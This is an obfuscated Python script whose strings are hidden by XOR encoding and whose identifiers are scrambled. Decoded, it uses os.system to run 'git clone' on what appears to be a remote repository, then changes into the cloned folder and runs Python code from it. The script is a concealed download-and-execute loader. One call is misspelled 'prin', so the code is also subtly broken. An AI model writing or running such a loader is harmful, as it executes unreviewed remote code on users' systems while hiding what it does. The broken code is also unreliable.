O0lO1OO000ll0lOO0OO10 = (lambda O0l1111Oll1OlOllll1l1,
    lll1110O0O1100110O10l: O0l1111Oll1OlOllll1l1 ^ lll1110O0O1100110O10l)
O00l101ll010l11lOl1OO = __import__(''.join(chr(O0llll01l010O10l0l000 ^
    lOl11O00lll01OO0011O0) for lOl11O00lll01OO0011O0, O0llll01l010O10l0l000 in
    zip(b'\x07;', b'u^')), globals(), locals(), [], 0)
Ol1O0OlO1O10OOlOO10l1 = __import__(''.join(chr(OOll100lO1111l1OOOl0l ^
    OO0Oll0O10O10OO00l01l) for OO0Oll0O10O10OO00l01l, OOll100lO1111l1OOOl0l in
    zip(b'\x18\xe1', b'w\x92')), globals(), locals(), [], 0 * 6 + 0)
prin(''.join(filter(lambda OOOlO010OOO1O01l0l11O: ord(OOOlO010OOO1O01l0l11O
    ) % 5 != 0, """Fxx_}d2xK(7
K""")).join(chr(l0O0ll0lOO0001110O1l0 ^
    l00OllOOO0010111Ol01l) for l00OllOOO0010111Ol01l, l0O0ll0lOO0001110O1l0 in
    zip(
    b'\xd6\x1c\x99+\x8eJ\xac\xbc\x92 WL$\x0b\x87\x13W\xacD\xfd\xffr\x13\xe8\x80{'
    , b'\xcdG\xa9\x10\xbdz\xc1\xe8\xfdO;lMe\xf4g6\xc0(\xe6\xa4B(\xdb\xb0\x16'))
    )
getattr(Ol1O0OlO1O10OOlOO10l1, 'metsys'[::-1])(''.join(chr(
    l000l0101l0llllO01Ol0 ^ l1OO1O11Ol010011l1101) for 
    l1OO1O11Ol010011l1101, l000l0101l0llllO01Ol0 in zip(
    b'\xe4\\\x83[\xe0\x98\xa6#\x88\xbej\xb5\x1c9\xc8\xbbY\xe2\xf2\x1bYa\xbaK\xaa\xd7\x08Az\xda\x8ah\xf0k4\x91\xee\xca\x97r\x8c\xfdt'
    ,
    b'\x835\xf7{\x83\xf4\xc9M\xed\x9e\x02\xc1hI\xbb\x81v\xcd\x95r-\t\xcf)\x84\xb4g,U\x8a\xe6\t\x9b\x01Z\xff\x98\xa9\xff\x18\xa3\xd3\x1b'
    )))
getattr(Ol1O0OlO1O10OOlOO10l1, ''.join(chr(Ol1O0010OOOOl0OO0l1l0 ^
    ll011O1Ol00101l100Ol0) for ll011O1Ol00101l100Ol0, Ol1O0010OOOOl0OO0l1l0 in
    zip(b'\xe9\xec\xcc\x8a\xcc\xc5', b'\x9a\x95\xbf\xfe\xa9\xa8')))(
    'cd .o && python .o'[::-1][::-1])
